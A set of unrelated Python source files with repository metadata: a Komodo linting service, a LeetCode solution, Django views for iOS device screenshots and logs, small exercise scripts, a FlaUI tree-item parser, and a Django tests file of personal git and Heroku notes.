[] |
no_license
|
AeonSaber/first_app
|
5ad89d4fb05d7662e2a39ce68176f43f1e618bf0
|
522fdfa6d33419fd49e431766fff85b40d21e78e
|
refs/heads/master
| 2020-06-12T17:22:09.786142
| 2013-09-09T23:57:51
| 2013-09-09T23:57:51
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 30,788
|
py
|
#!python
# ***** BEGIN LICENSE BLOCK *****
# Version: MPL 1.1/GPL 2.0/LGPL 2.1
#
# The contents of this file are subject to the Mozilla Public License
# Version 1.1 (the "License"); you may not use this file except in
# compliance with the License. You may obtain a copy of the License at
# http://www.mozilla.org/MPL/
#
# Software distributed under the License is distributed on an "AS IS"
# basis, WITHOUT WARRANTY OF ANY KIND, either express or implied. See the
# License for the specific language governing rights and limitations
# under the License.
#
# The Original Code is Komodo code.
#
# The Initial Developer of the Original Code is ActiveState Software Inc.
# Portions created by ActiveState Software Inc are Copyright (C) 2000-2007
# ActiveState Software Inc. All Rights Reserved.
#
# Contributor(s):
# ActiveState Software Inc
#
# Alternatively, the contents of this file may be used under the terms of
# either the GNU General Public License Version 2 or later (the "GPL"), or
# the GNU Lesser General Public License Version 2.1 or later (the "LGPL"),
# in which case the provisions of the GPL or the LGPL are applicable instead
# of those above. If you wish to allow use of your version of this file only
# under the terms of either the GPL or the LGPL, and not to allow others to
# use your version of this file under the terms of the MPL, indicate your
# decision by deleting the provisions above and replace them with the notice
# and other provisions required by the GPL or the LGPL. If you do not delete
# the provisions above, a recipient may use your version of this file under
# the terms of any one of the MPL, the GPL or the LGPL.
#
# ***** END LICENSE BLOCK *****
import os, sys
import threading
import time
import urllib2
from xpcom import components, nsError, ServerException, COMException
from xpcom._xpcom import PROXY_SYNC, PROXY_ALWAYS, PROXY_ASYNC, getProxyForObject
from xpcom.server import WrapObject, UnwrapObject
from koLintResult import KoLintResult, getProxiedEffectivePrefs
from koLintResults import koLintResults
import logging
log = logging.getLogger("koLintService")
#log.setLevel(logging.DEBUG)
class RequestQueue:
# This is a modification if Python's std Queue.Queue class:
# - drop maxsize related stuff
# - calls are always blocking
# - add .prepend() and .remove_uid()
def __init__(self):
import thread
self._init()
self.mutex = thread.allocate_lock()
self.esema = thread.allocate_lock() # if acquired, then queue is empty
self.esema.acquire()
def put(self, item):
"""Put an item into the queue."""
log.debug("in RequestQueue.put, acquiring mutex")
self.mutex.acquire()
log.debug("in RequestQueue.put, acquired mutex")
try:
was_empty = self._empty()
self._append(item)
# If we fail before here, the empty state has
# not changed, so we can skip the release of esema
if was_empty:
log.debug("in RequestQueue.put, releasing esema")
self.esema.release()
finally:
# Catching system level exceptions here (RecursionDepth,
# OutOfMemory, etc) - so do as little as possible in terms
# of Python calls.
log.debug("in RequestQueue.put, releasing mutex")
self.mutex.release()
def prepend(self, item):
"""Prepend an item to the queue."""
log.debug("in RequestQueue.prepend, acquiring mutex")
self.mutex.acquire()
log.debug("in RequestQueue.prepend, acquired mutex")
try:
was_empty = self._empty()
self._prepend(item)
# If we fail before here, the empty state has
# not changed, so we can skip the release of esema
if was_empty:
log.debug("in RequestQueue.prepend, releasing esema")
self.esema.release()
finally:
# Catching system level exceptions here (RecursionDepth,
# OutOfMemory, etc) - so do as little as possible in terms
# of Python calls.
log.debug("in RequestQueue.prepend, releasing mutex")
self.mutex.release()
def get(self):
"""Remove and return an item from the queue.
Block if necessary until an item is available.
"""
log.debug("in RequestQueue.get, acquiring esema")
self.esema.acquire()
log.debug("in RequestQueue.get, acquired esema")
log.debug("in RequestQueue.get, acquiring mutex")
self.mutex.acquire()
log.debug("in RequestQueue.get, acquired mutex")
release_esema = 1
try:
item = self._get()
# Failure means empty state also unchanged - release_esema
# remains true.
release_esema = not self._empty()
finally:
if release_esema:
log.debug("in RequestQueue.get, releasing esema")
self.esema.release()
log.debug("in RequestQueue.get, releasing mutex")
self.mutex.release()
return item
def remove_uid(self, uid):
"""Remove all current requests with the given uid.
Does not return anything.
"""
log.debug("in RequestQueue.remove_uid, acquiring esema")
if not self.esema.acquire(0): # do not block to acquire lock
# return if could not acquire: means queue is empty and
# therefore do not have any items to remove
log.debug("in RequestQueue.remove_uid, did not acquire esema")
return
log.debug("in RequestQueue.remove_uid, acquired mutex")
log.debug("in RequestQueue.remove_uid, acquiring mutex")
self.mutex.acquire()
release_esema = 1
try:
self._remove_uid(uid)
# Failure means empty state also unchanged - release_esema
# remains true.
release_esema = not self._empty()
finally:
if release_esema:
log.debug("in RequestQueue.remove_uid, releasing esema")
self.esema.release()
log.debug("in RequestQueue.remove_uid, releasing mutex")
self.mutex.release()
#---- Override these methods to implement other queue organizations
# (e.g. stack or priority queue). These will only be called with
# appropriate locks held.
# Initialize the queue representation
def _init(self):
self.queue = []
# Check whether the queue is empty
def _empty(self):
return not self.queue
# Put a new item in the queue
def _append(self, item):
self.queue.append(item)
def _prepend(self, item):
self.queue.insert(0, item)
# Get an item from the queue
def _get(self):
item = self.queue[0]
del self.queue[0]
return item
# Remove all requests with the given uid.
def _remove_uid(self, uid):
self.queue = [item for item in self.queue
if hasattr(item, "uid") and item.uid != uid]
class _GenericAggregator(object):
_com_interfaces_ = [components.interfaces.koILinter]
_reg_desc_ = "Komodo Generic Aggregate Linter"
_reg_clsid_ = "{b68f4ff8-f37e-45d1-970e-88b964e7096d}"
_reg_contractid_ = "@activestate.com/koGenericLinterAggregator;1"
def initialize(self, languageName, koLintService):
self._languageName = languageName
self._koLintService = koLintService
def lint(self, request):
text = request.content.encode(request.encoding.python_encoding_name)
return self.lint_with_text(request, text)
def lint_with_text(self, request, text):
linters = self._koLintService.getTerminalLintersForLanguage(self._languageName)
finalLintResults = koLintResults()
for linter in linters:
try:
newLintResults = UnwrapObject(linter).lint_with_text(request, text)
except:
log.exception("lint_with_text exception")
else:
if newLintResults and newLintResults.getNumResults():
if finalLintResults.getNumResults():
finalLintResults = finalLintResults.addResults(newLintResults)
else:
finalLintResults = newLintResults
return finalLintResults
class KoLintRequest:
_com_interfaces_ = [components.interfaces.koILintRequest]
_reg_desc_ = "Komodo Lint Request"
_reg_clsid_ = "{845A872F-293F-4a82-8552-40849A92EC80}"
_reg_contractid_ = "@activestate.com/koLintRequest;1"
def __init__(self):
self.rid = None
self._koDoc = None
self.uid = ''
self.linterType = ''
self.cwd = ''
self.content = None
self.encoding = None
self.linter = None
self.results = None
self.errorString = ''
@property
def document(self):
import warnings
warnings.warn("`koILintRequest.document` was DEPRECATED in Komodo "
"6.0.0b1, use `koILintRequest.koDoc`.",
DeprecationWarning)
return self.koDoc
@property
def koDoc(self):
return self._koDoc
def get_koDoc(self):
return self._koDoc
def set_koDoc(self, val):
# Access to the koDoc *must* be from the main thread, otherwise
# Komodo may crash!
self._koDoc = getProxyForObject(1,
components.interfaces.koIDocument, val,
PROXY_ALWAYS | PROXY_SYNC)
def describe(self):
return "<KoLintRequest: %s on uid %s>" % (self.linterType, self.uid)
class KoLintService:
_com_interfaces_ = [components.interfaces.koILintService,
components.interfaces.nsIObserver]
_reg_desc_ = "Komodo Lint Management Service"
_reg_clsid_ = "{9FD67601-CB60-411D-A212-ED21B3D25C15}"
_reg_contractid_ = "@activestate.com/koLintService;1"
def __init__(self):
log.info("KoLintService.__init__()")
self._linterCache = {} # mapping of linterCID to koILinter instance
self.requests = RequestQueue() # an item of None is the quit sentinel
self._shuttingDown = 0
self.manager = threading.Thread(target=self.run, name="Linter")
self.manager.setDaemon(True)
self.manager.start()
self._wrapped = WrapObject(self, components.interfaces.nsIObserver)
_observerSvc = components.classes["@mozilla.org/observer-service;1"].\
getService(components.interfaces.nsIObserverService)
_observerSvc.addObserver(self._wrapped, 'xpcom-shutdown', 1)
self._prefs = components.classes["@activestate.com/koPrefService;1"].\
getService(components.interfaces.koIPrefService).prefs
# dict of { 'terminals' => array of linters, 'aggregators' => array of linters }
self._linterCIDsByLanguageName = {}
# Init it now, pay the price of walking through the categories now...
catman = components.classes["@mozilla.org/categorymanager;1"].\
getService(components.interfaces.nsICategoryManager)
categoryName = 'category-komodo-linter-aggregator'
names = catman.enumerateCategory(categoryName)
while names.hasMoreElements():
nameObj = names.getNext()
rawName, fixedName = self._getCategoryNameFromNameObj(nameObj)
cid = catman.getCategoryEntry(categoryName, rawName)
if not self._linterCIDsByLanguageName.has_key(fixedName):
self._linterCIDsByLanguageName[fixedName] = {'terminals':[],
'aggregator':cid}
else:
log.warn("Possible Problem: more than one entry for linter aggregator %s (was %s), now %s",
name,
self._linterCIDsByLanguageName[fixedName]['aggregator'],
cid)
self._linterCIDsByLanguageName[fixedName]['aggregator'] = cid
categoryName = 'category-komodo-linter'
names = catman.enumerateCategory(categoryName)
while names.hasMoreElements():
nameObj = names.getNext()
rawName, fixedName = self._getCategoryNameFromNameObj(nameObj)
idx = fixedName.find("&type=")
if idx == -1:
languageName = fixedName
else:
languageName = fixedName[:idx]
cid = catman.getCategoryEntry(categoryName, rawName)
if not self._linterCIDsByLanguageName.has_key(languageName):
self._linterCIDsByLanguageName[languageName] = {'terminals':[],
'aggregator':None}
self._linterCIDsByLanguageName[languageName]['terminals'].append(cid)
#log.debug("Loaded these linters: %s", self._linterCIDsByLanguageName)
def _getCategoryNameFromNameObj(self, nameObj):
nameObj.QueryInterface(components.interfaces.nsISupportsCString)
rawName = nameObj.data
try:
fixedName = urllib2.unquote(rawName)
except:
fixedName = rawName
return rawName, fixedName
def getLinter_CID_ForLanguage(self, languageName):
return self._getLinterCIDByLanguageName(languageName)
def observe(self, subject, topic, data):
#print "file status service observed %r %s %s" % (subject, topic, data)
if topic == 'xpcom-shutdown':
log.debug("file status got xpcom-shutdown, unloading");
self.terminate()
def terminate(self):
log.info("KoLintService.terminate()")
self.requests.prepend(None) # prepend the quit sentinel
self._shuttingDown = 1
# Do NOT attempt to .join() the manager thread because it is nigh on
# impossible to avoid all possible deadlocks.
def getTerminalLintersForLanguage(self, languageName):
return [self._getLinterByCID(cid)
for cid in self._linterCIDsByLanguageName[languageName]['terminals']]
GENERIC_LINTER_AGGREGATOR_CID = "@activestate.com/koGenericLinterAggregator;1"
def _getLinterCIDByLanguageName(self, languageName):
try:
linters = self._linterCIDsByLanguageName[languageName]
except KeyError:
self._linterCIDsByLanguageName[languageName] = {'aggregator':None,
'terminals':[],
'generated':True}
return None
# If there's no explicit aggregator, return the first terminal linter.
# If there isn't one, throw the ItemError all the way to top-level
if linters['aggregator'] is not None:
return linters['aggregator']
if len(linters['terminals']) != 1:
if len(linters['terminals']) == 0:
if not linters.get('generated', False):
log.error("No terminal linters for lang %s", languageName)
return None
# Create a generic aggregator for this language.
linters['aggregator'] = (self.GENERIC_LINTER_AGGREGATOR_CID
+ ":" + languageName)
return linters['aggregator']
return linters['terminals'][0]
def getLinterForLanguage(self, languageName):
"""Return a koILinter XPCOM component of the given linterCID.
This method cache's linter instances. If there is no such linter
then an exception is raised.
Note that aggregators are favored over terminal linters.
"""
linterCID = self._getLinterCIDByLanguageName(languageName)
if linterCID is None:
return None
return self._getLinterByCID(linterCID)
def _getLinterByCID(self, linterCID):
if linterCID not in self._linterCache:
try:
if linterCID.startswith(self.GENERIC_LINTER_AGGREGATOR_CID):
languageName = linterCID[len(self.GENERIC_LINTER_AGGREGATOR_CID) + 1:]
linter = components.classes[self.GENERIC_LINTER_AGGREGATOR_CID].createInstance(components.interfaces.koILinter)
UnwrapObject(linter).initialize(languageName, self)
elif linterCID not in components.classes.keys():
linter = None
else:
linter = components.classes[linterCID].createInstance(components.interfaces.koILinter)
except COMException, ex:
errmsg = "Internal Error creating a linter with CID '%s': %s"\
% (linterCID, ex)
raise ServerException(nsError.NS_ERROR_UNEXPECTED, errmsg)
self._linterCache[linterCID] = linter
return self._linterCache[linterCID]
def addRequest(self, request):
"""Add the given request to the queue.
If there is an error (e.g. bogus linterType) an exception is raised.
"""
log.info("KoLintService.addRequest(%s)", request.describe())
# Fill out the request (because document access and component
# creation must often be done in the main thread).
request.content = request.koDoc.buffer
request.encoding = request.koDoc.encoding
if request.linterType:
request.linter = self.getLinterForLanguage(request.linterType)
self.requests.put(request)
def cancelPendingRequests(self, uid):
log.info("KoLintService.cancelPendingRequests(uid='%s')", uid)
self.requests.remove_uid(uid)
# This does nothing to stop the reporting of results from a
# possible _currently running_ lint request for this uid.
# This is currently handled on the JavaScript side via the
# koILintRequest.rid attribute.
def _getEncodingLintResults(self, content, encoding):
"""Return lint results for encoding errors in the given document.
"content" is the document content as a unicode string
"encoding" is the currently selected encoding for the document
Returns a koLintResults instance.
"""
try:
encodedString = content.encode(encoding.python_encoding_name,
"strict")
except UnicodeError, ex:
pass # errors are handled after the try/except/else block
else:
return koLintResults() # no encoding errors
# Find the specific errors by encoding with "replace" and finding
# where those replacements were.
escapedContent = content.replace('?', 'X')
encodedString = escapedContent.encode(encoding.python_encoding_name,
"replace")
offset = 0
indeces = []
while 1:
index = encodedString.find('?', offset)
if index == -1:
break
indeces.append(index)
offset = index + 1
log.debug("encoding errors at indeces %s", indeces)
results = koLintResults()
lines = content.splitlines(1) # keep line terminators
offset = 0 # the current offset in the document
for i in range(len(lines)):
line = lines[i]
while indeces and indeces[0] < offset + len(line):
index = indeces.pop(0) # this index is on this line
r = KoLintResult()
r.description = "This character cannot be represented with "\
"the current encoding: '%s'"\
% encoding.python_encoding_name
r.lineStart = i+1
r.lineEnd = i+1
r.columnStart = index - offset + 1
r.columnEnd = r.columnStart + 1
log.debug("encoding error: index=%d: %d,%d-%d,%d", index,
r.lineStart, r.columnStart, r.lineEnd, r.columnEnd)
r.severity = r.SEV_ERROR
results.addResult(r)
if not indeces:
break
offset += len(line)
else:
raise ValueError("Did not find line and column for one or "
"more indeces in content: %s" % indeces)
return results
def _addMixedEOLWarnings(self, results, content, expectedEOL):
"""Add lint results (at the WARNING level) for each line that has
an unexpected EOL.
"results" in a koILintResults to which to add mixed EOL results.
"content" is the content to analyze
"expectedEOL" is the currently configured EOL for the document,
this must be on of the EOL_LF, EOL_CR, EOL_CRLF constants.
"""
import eollib
mixedEOLs = eollib.getMixedEOLLineNumbers(content, expectedEOL)
if not mixedEOLs:
return
def collapseContinuousLineNumbers(lineNos):
"""Return a collapsed group of continuous line numbers."""
results = []
start = -10
last = -10
for lineNo in lineNos:
if lineNo == last+1:
pass
else:
if start >= 0:
results.append((start, last))
start = lineNo
last = lineNo
if start >= 0:
results.append((start, last))
return results
# Add a warning lint result for each such line.
expectedEOLStr = eollib.eol2eolPref[expectedEOL]
lines = content.splitlines(1)
# For performance reasons, we collapse groups of continuous line
# numbers into the one line result - bug 92733.
for lineStart, lineEnd in collapseContinuousLineNumbers(mixedEOLs):
r = KoLintResult()
r.description = "This line does not end with the expected "\
"EOL: '%s' (select View | View EOL Markers)"\
% expectedEOLStr
r.lineStart = lineStart+1
r.lineEnd = lineEnd+1
r.columnStart = 1
r.columnEnd = len(lines[lineEnd]) + 1
r.severity = r.SEV_WARNING
results.addResult(r)
# When a new panel is added for a language in
# pref-syntax-checking.xul, we'll need to pull the generic marker
# out of any documents that adopted it. We can either do it when
# we open the doc (although we have to wait until we know its language),
# but this way we only check when we're about to lint.
#
# Also, it's too bad that doc prefs aren't versioned.
_no_longer_generic_languages = ["Python3", "HTML5"]
def _passesGenericCheck(self, request):
prefs = request.koDoc.prefs
languageName = request.koDoc.language
genericCheck = "genericLinter:" + languageName
if not prefs.hasPref(genericCheck):
return True
if languageName in self._no_longer_generic_languages:
prefs.deletePref(genericCheck)
return True
return prefs.getBooleanPref(genericCheck)
def run(self):
"""Process lint requests serially until told to stop.
Before the requested linter is run on a document it is first checked
for encoding problems (i.e. encoding is not sufficient for current
content).
"""
TIME_LINTS = False
log.info("manager thread: start")
while 1:
try:
# wait for next request
request = self.requests.get()
# quit if request is the quit sentinel
if request is None:
log.info("manager thread: quit sentinel")
break
# process the request
if TIME_LINTS: startlint = time.clock()
log.info("manager thread: process request: %r", request)
try:
# Look for encoding errors first.
results = self._getEncodingLintResults(request.content,
request.encoding)
if TIME_LINTS: endencodinglint = time.clock()
# If there were no encoding errors, try the
# requested linter.
if not results.getNumResults() and request.linter:
#XXX This is where context-sensitive linting args should
# be passed in, but linters don't support this yet.
log.debug("manager thread: call linter.lint(request)")
try:
if self._passesGenericCheck(request):
results = request.linter.lint(request)
#results = UnwrapObject(request.linter).lint(request)
# This makes a red statusbar icon go green, but it
# might not be what we always want.
# Needs more investigation.
#if results is None:
# results = koLintResults()
except:
log.exception("Unexpected error while linting")
# This makes a red statusbar icon go green, but it
# might not be what we always want.
# Needs more investigation.
#if results is None:
# results = koLintResults()
log.debug("manager thread: linter.lint(request) returned")
if TIME_LINTS: endlintlint = time.clock()
prefset = getProxiedEffectivePrefs(request)
if prefset.getBooleanPref("lintEOLs"):
# Also look for mixed-line endings warnings.
self._addMixedEOLWarnings(results, request.content,
request.koDoc.new_line_endings)
if TIME_LINTS:
endeollint = time.clock()
print "lint of '%s': encoding=%.3fs lint=%.3fs eol=%.3fs"\
% (request.koDoc.baseName,
endencodinglint-startlint,
endlintlint-endencodinglint,
endeollint-endlintlint)
request.results = results
except (ServerException, COMException), ex:
request.errorString = str(ex)
except:
# Any exceptions that are not ServerException or
# COMException are unexpected internal errors.
try:
err = "unexpected internal error checking '%s' with '%s' linter"\
% (request.koDoc.baseName, request.linterType)
log.exception(err)
request.errorString = err
except:
err = "Unexpected error in koLintService.run"
log.error(err)
request.errorString = err
else:
log.info("manager thread: lint results for uid %s: %r",
request.uid, results)
# Notify of request completion
# Note: this is not guaranteed to properly guard the proxy
# call because a context switch could happen in between the
# condition check and body. That is ok though. At worst it
# will raise an exception that will be trapped just below.
# The point is to catch the common case. I am pretty sure
# that there is no way to do this properly without going
# to great lengths.
if not self._shuttingDown:
try:
# Proxy this so the worker thread can report results on this iface.
lintBufferProxy = getProxyForObject(1,
components.interfaces.koILintBuffer, request.lintBuffer,
PROXY_ALWAYS | PROXY_SYNC)
lintBufferProxy.reportResults(request)
except COMException, ex:
# Ignore this error, which will happen if results
# are reported after the buffer has gone away (i.e.
# the file owning that buffer was closed):
# Traceback (most recent call last):
# File "...\koLintService.py", line 370, in run
# request.lintBuffer.reportResults(request)
# File "<XPCOMObject method 'reportResults'>", line 3, in reportResults
# Exception: 0x80570021 ()
errno = ex.args[0]
if errno == 0x80570021:
pass
else:
raise
except:
# Something bad happened, but don't let this thread die.
log.exception("unexpected error in the linting thread")
log.info("manager thread: end")
if __name__ == "__main__":
logging.basicConfig()
import pprint
class TestRequest:
def __init__(self, uid):
self.uid = uid
def __repr__(self):
return "<TestRequest: uid=%s>" % self.uid
q = RequestQueue()
if 0:
q.put(TestRequest("id_1"))
q.remove_uid("id_1")
print "item:"
sys.stdout.flush()
print q.get()
if 1:
q.put(TestRequest("id_1"))
q.put(TestRequest("id_2"))
pprint.pprint(q.queue)
print "item: ", q.get()
q.put(TestRequest("id_3"))
q.put(TestRequest("id_4"))
q.put(TestRequest("id_3"))
q.prepend(None)
pprint.pprint(q.queue)
q.remove_uid("id_3")
pprint.pprint(q.queue)
q.remove_uid("id_3")
sys.stdout.flush()
pprint.pprint(q.queue)
q.remove_uid("id_4")
pprint.pprint(q.queue)
print "item: ", q.get()
print "item: ", q.get()
pprint.pprint(q.queue)
|
[
"jpsutton@madisoncollege.edu"
] |
jpsutton@madisoncollege.edu
|
aa80166792010844c80020d87de369afec96d42a
|
5eff9df4d276e83c68ce843d58868499858f701a
|
/Leetcode - FB/p0350.py
|
3780986eb5c2d856d4e29deeeacac48b9f10fdf7
|
[] |
no_license
|
arunraman/Code-Katas
|
b6723deb00caed58f0c9a1cafdbe807e39e96961
|
7fe3582fa6acf59a2620fe73e1e14bd8635bbee8
|
refs/heads/master
| 2023-03-04T17:27:44.037145
| 2023-03-02T21:09:53
| 2023-03-02T21:09:53
| 25,232,784
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 456
|
py
|
class p0349(object):
def intersectiontwoArrays(self, nums1, nums2):
dict1 = dict()
for i in nums1:
if i not in dict1:
dict1[i] = 1
else:
dict1[i] += 1
ret = []
for i in nums2:
if i in dict1 and dict1[i] > 0:
ret.append(i)
dict1[i] -= 1
return ret
S = p0349()
print S.intersectiontwoArrays([1, 2, 2, 1], [2, 2])
|
[
"arunraman.19@gmail.com"
] |
arunraman.19@gmail.com
|
615af52a6dfc9a4109231f08258cb4464601be9f
|
daa513724c547b06fdd6b52764d217db09fe6204
|
/iosapp/views.py
|
33dd5ffa2576380fb01eecca0ead1d4a0919c2e2
|
[] |
no_license
|
sunkeqiao/TMT-Server
|
4f95c75500f216f6694ce84eafab7b18b02eb772
|
e23b75a2f0cfc6960f788b3d0e6727614aea3c02
|
refs/heads/master
| 2020-09-01T10:26:50.834786
| 2019-06-19T16:14:31
| 2019-06-19T16:14:31
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,988
|
py
|
from django.http import Http404
from rest_framework import generics, mixins, views
from rest_framework.response import Response
from .models import *
from django.conf import settings
import json
from channels.layers import get_channel_layer
from asgiref.sync import async_to_sync
from .serializers import *
from .libimobiledevice import Libimobiledevice
import threading, time
lib_mobile = None
def keep_connect_mac():
global lib_mobile
if lib_mobile:
return lib_mobile
try:
lib_mobile = Libimobiledevice()
return lib_mobile
except Exception as e:
lib_mobile = None
return False
keep_connect_mac()
class DeviceObject(views.APIView):
"""
设备列表
"""
def get(self, request):
"""
设备列表
"""
devices = iOSDevice.objects.filter(owner__in=('public', request.session['user'].get('username')))
serializer = iOSDeviceSerializer(devices, many=True)
return Response({"status": True, "message": "成功", "data": serializer.data})
class DeviceScreenShotObject(views.APIView):
"""
截屏操作
"""
def post(self, request, uuid):
"""
截屏操作
"""
to = request.session['user'].get('username')
if not keep_connect_mac():
return Response({"status": False, "message": "MAC服务器不在线", "data": ""})
# 执行截图 与 设备信息 操作,并上传
response = lib_mobile.screenshot_device_info_then_upload(uuid, to)
if not response.get('file_info'):
return Response({"status": False, "message": "失败,请检查设备是否在线", "data": ""})
# 发送消息给人
channel_layer = get_channel_layer()
async_to_sync(channel_layer.group_send)(to, {
"device_info": deal_with_device_info(response.get('device_info')),
"message": response.get('file_info'),
"room": f"{to}_ios",
"to": to,
"type": "message"
})
return Response({"status": True, "message": "成功", "data": ""})
class DeviceLogCatObject(views.APIView):
"""
抓日志操作
"""
def post(self, request, uuid):
"""
抓日志操作
"""
to = request.session['user'].get('username')
action = request.data.get('action')
if not keep_connect_mac():
return Response({"status": False, "message": "MAC服务器不在线", "data": ""})
if action == 'start':
try:
if lib_mobile.syslog_start(uuid):
threading.Thread(target=self.delay_stop, args=(request, uuid,)).start()
return Response({"status": True, "message": "成功", "data": ""})
else:
return Response({"status": False, "message": "失败,请检查设备是否在线", "data": ""})
except Exception as e:
return Response({"status": False, "message": str(e), "data": ""})
elif action == 'stop':
# 执行结束抓日志 与 设备信息 操作,并上传
response = lib_mobile.syslog_device_info_then_upload(uuid, to)
if not response.get('file_info'):
return Response({"status": False, "message": "失败,请检查设备是否在线", "data": ""})
# 发送消息给人
channel_layer = get_channel_layer()
async_to_sync(channel_layer.group_send)(to, {
"device_info": deal_with_device_info(response.get('device_info')),
"message": response.get('file_info'),
"room": f"{to}_ios",
"to": to,
"type": "message"
})
return Response({"status": True, "message": "成功", "data": ""})
elif action == 'delay_stop':
lib_mobile.syslog_stop(uuid)
else:
return Response({"status": False, "message": "action指令不正确", "data": ""})
def delay_stop(self, request, uuid):
time.sleep(125)
request.data['action'] = 'delay_stop'
self.post(request, uuid)
def deal_with_device_info(device_info):
baseinfo = BaseDeviceInfo.objects.all()
base_device_info = {}
for info in baseinfo:
base_device_info[info.model_id] = info
return {
"device_name": base_device_info.get(device_info.get('ProductType')).name,
"system": f"iOS {device_info.get('ProductVersion')}",
"screen": base_device_info.get(device_info.get('ProductType')).screen,
"memory": f"总容量:{round(int(base_device_info.get(device_info.get('ProductType')).ram)/1024.0,2)}GB",
"storage": f"总容量{round(int(device_info.get('TotalDataCapacity'))/1024.0/1024.0/1024.0,2)}GB,可使用{round(int(device_info.get('TotalDataAvailable'))/1024.0/1024.0/1024.0,2)}GB",
"charge": f"{device_info.get('BatteryCurrentCapacity')}%",
}
|
[
"445462004@qq.com"
] |
445462004@qq.com
|
7085b43ca65f48b5500e2da986e2f06eda812634
|
b2eaa0024ba6c8c7986bf3e107deb7308e3658d0
|
/python/06_day/try_guess.py
|
494995380aa080787578df45b3f4f6c1e3b94487
|
[] |
no_license
|
olitskevich/szkolenie
|
aabf9589b0d5114761e77a0a4934821e1ba051ac
|
0e8d752e9753f262edae58d61795544c34fb6563
|
refs/heads/master
| 2020-04-25T05:51:52.234718
| 2019-03-09T14:42:56
| 2019-03-09T14:42:56
| 172,557,290
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 741
|
py
|
import random
random_number = random.randint(0,100)
attempt = 0
max_attempt = 7
my_number = 555
try:
while my_number != random_number:
print("Your mumber: ")
my_number = int(input())
attempt+=1
if my_number == random_number:
print("Congratulation! You've guessed the number from the", attempt, "attemp")
else:
if my_number > random_number:
print("Choose smaller number")
else:
print("Choose bigger number")
if attempt >= max_attempt:
print("Sorry! You have no more attempts, the correct number is", random_number)
break
except KeyboardInterrupt:
print ("Thanks for participation")
|
[
"olgalickewicz@uber.com"
] |
olgalickewicz@uber.com
|
d261d6ca537220689a62cbf436cb312e521bf1d7
|
7289ebef10cdb7b7cbd834d749f46ace65624941
|
/7- Introduction - Fonctions/fonction.py
|
3f23f0678e2dcbcd67977a84f4f4e3669d0d1298
|
[] |
no_license
|
633-1-ALGO/introduction-python-FrankTheodoloz
|
14e7157371b707dcf26688818cdbeb4090526a8b
|
20aa27aa2bc8c562260e23c8cc30f3d0dcdc5a5c
|
refs/heads/master
| 2020-07-29T20:01:15.802637
| 2019-10-06T17:51:06
| 2019-10-06T17:51:06
| 209,942,919
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 181
|
py
|
# Exemple de fonction
def multiplication(n, m, p=1): # p a comme valeur par défaut 1
print(n * m)
print(n * m * p)
multiplication(3, 4)
print()
multiplication(3, 4, 2)
|
[
"dhteodoro@gmail.com"
] |
dhteodoro@gmail.com
|
75ccd35c5fba5907e941b6f34fb90120507e400e
|
649d435286f4ead4ca29feea4f6766c8ae03f475
|
/src/FlaUILibrary/flaui/util/treeitemsparser.py
|
af1fa3c59c08ce665e0de02dee95aeda188ddce5
|
[
"MIT",
"Python-2.0"
] |
permissive
|
minatuyang/robotframework-flaui
|
1fe1c5555781d6d288bfe2eabbe12840050af77e
|
352851193265d62ab8282dd9ac2a416fe47e4717
|
refs/heads/main
| 2023-06-21T23:35:22.385202
| 2021-07-20T16:06:48
| 2021-07-20T20:30:19
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,663
|
py
|
from FlaUILibrary.flaui.exception import FlaUiError
class TreeItemsParser:
""" Helper class which handles the management of the given location string.
The location is used to locate the exact tree item in the tree control.
Examples:
location = N:Nameofitem1->N:Nameofitem2->N:Nameofitem3
location = I:indexofitem1->I:indexofitem2->I:indexofitem3
location = N:Nameofitem1->I:indexofitem2->I:indexofitem3
"""
def __init__(self, location):
self.location = location.split("->")
def get_treeitem(self, treeitems, index):
""" This function gets the index of the location, the location can either be name or index,
and returns the corresponding tree item to that name or index.
if the given name or index is not found a flauierror will be thrown.
"""
loc = self.location[index]
if loc.startswith("I:"):
loc = loc[2:]
try:
return treeitems[int(loc)]
except IndexError:
raise FlaUiError(FlaUiError.ArrayOutOfBoundException.format(int(loc))) from None
elif loc.startswith("N:"):
loc = loc[2:]
for item in treeitems:
if item.Name == loc:
return item
raise FlaUiError(FlaUiError.ElementNameNotFound.format(loc))
else:
raise FlaUiError(FlaUiError.FalseSyntax.format(loc)) from None
def is_last_element(self, index):
"""Retruns true if the index corresponds the last element of given location series.
"""
if index==len(self.location)-1:
return True
return False
|
[
"andreas.sekulski@gmail.com"
] |
andreas.sekulski@gmail.com
|
bb883369d18920a27cc801735cf6b29fead3ce45
|
58c4acb298cfd1c47157d5ec657829f7465b64e5
|
/cable/tests.py
|
0f012306a8f13a4c0098fb07e71ed66f04ba8bae
|
[] |
no_license
|
AlexsandroMO/Cables_Projcts
|
c5b72e75a58e155dd7b17971793fcddef5fe4526
|
6ede9efc591d638769ded1ac75fa41d43e804496
|
refs/heads/master
| 2020-12-05T01:33:07.409735
| 2020-01-11T23:41:58
| 2020-01-11T23:41:58
| 231,967,765
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,054
|
py
|
from django.test import TestCase
# Create your tests here.
#https://www.geeksforgeeks.org/textfield-django-models/
<<<<<<< HEAD
#https://realpython.com/django-redirects/#passing-parameters-with-redirects
=======
#https://www.w3schools.com/css/css_table.asp
>>>>>>> homolog
#pip3 install django-crispy-forms
#Zerar senha do admin
#python manage.py shell
#from django.contrib.auth.models import User
#User.objects.filter(is_superuser=True)
#usr = User.objects.get(username='nome-do-administrador')
#usr.set_password('nova-senha')
#usr.save()
'''Upload documents on Github
git clone <nome>
<entra na pasta criada>
git add .
git commit -m "texto"
git push
git pull
'''
'''git checkout -b nome cria uma branch
git checkout nome entra na branch
git branch - verifica as branchs
git checkout master - entra na master
git merge origin "nome"
git push origin master - subir commit
git branch -D "nome"- deletar branch
'''
#Heroku
#https://github.com/Gpzim98/django-heroku
#git add .gitignore
#colocar no gitignore
'''.idea
.pyc
.DS_Store
*.sqlite3'''
'''
Publishing the app
git add .
git commit -m "Configuring the app"
git push heroku master --force
'''
'''
def newTask(request):
if request.method == 'POST':
form = ResidencDimensForm(request.POST)
if form.is_valid():
task = form.save(commit=False)
task.total_va = (task.potencia_va * task.quant)
